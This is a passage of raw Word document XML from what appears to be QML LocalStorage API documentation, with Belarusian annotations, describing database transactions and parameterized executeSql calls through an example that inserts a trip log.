      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'INSERT INTO trip_log VALUES(?, ?, ?)'</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'01/10/2016'</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Sylling - Vikersund'</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'53'</w:t>
      </w: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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">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0821BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="000821BB" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1DE7" w:rsidRPr="000821BB" w:rsidRDefault="008F1DE7" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>гэта функцыя дазваляе пры ўнёску зменаў змяняць версію базы дадзен</w:t>
      </w:r>
      <w:r w:rsidRPr="000821BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1358" w:name="db-transaction-callback-tx"/>
      <w:bookmarkStart w:id="1359" w:name="_Toc483000821"/>
      <w:bookmarkStart w:id="1360" w:name="_Toc483604167"/>
      <w:bookmarkStart w:id="1361" w:name="_Toc483605387"/>
      <w:bookmarkEnd w:id="1358"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db.transaction(callback(tx))</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1359"/>
      <w:bookmarkEnd w:id="1360"/>
      <w:bookmarkEnd w:id="1361"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This method creates a read/write transaction and passed to</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callback</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this function, you can call</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>executeSql</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</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tx</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to read and modify the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="00464480" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If the callback throws exceptions, the transaction is rolled back. Below you will find an </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a database transaction </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which catches exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00464480" w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Так і трэба пісаць код для базы дадзен.</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</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openDatabaseSync</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"ActivityTrackDB"</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"Database tracking sports activities"</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1000000</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db</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transaction</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try</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function</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tx</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tx</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executeSql</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'INSERT INTO trip_log VALUES(?, ?,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'01/10/2016'</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'Sylling - Vikersund'</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'53'</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catch</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err</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console</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log</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"Error inserting into table Greeting: "</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err</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1362" w:name="db-readtransaction-callback-tx"/>
      <w:bookmarkStart w:id="1363" w:name="_Toc483000822"/>
      <w:bookmarkStart w:id="1364" w:name="_Toc483604168"/>
      <w:bookmarkStart w:id="1365" w:name="_Toc483605388"/>
      <w:bookmarkEnd w:id="1362"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db.readTransaction(callback(tx))</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1363"/>
      <w:bookmarkEnd w:id="1364"/>
      <w:bookmarkEnd w:id="1365"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This method </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creates a read-only transaction and passed to</w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this function, you can call</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executeSql</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on</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tx</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to read the database (with SELECT statements).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1366" w:name="results-tx-executesql-statement-values"/>
      <w:bookmarkStart w:id="1367" w:name="_Toc483000823"/>
      <w:bookmarkStart w:id="1368" w:name="_Toc483604169"/>
      <w:bookmarkStart w:id="1369" w:name="_Toc483605389"/>
      <w:bookmarkEnd w:id="1366"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>results = tx.executeSql(statement, values)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1367"/>
      <w:bookmarkEnd w:id="1368"/>
      <w:bookmarkEnd w:id="1369"/>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This method executes a SQL</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statement</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, binding the list of</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL positional parameters ("?")</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It returns a </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>results object</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00464480">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="984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574"/>
        <w:gridCol w:w="2604"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="2835"/>
      </w:tblGrid>
      <w:tr w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidTr="0068181D">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0068181D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835"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68181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
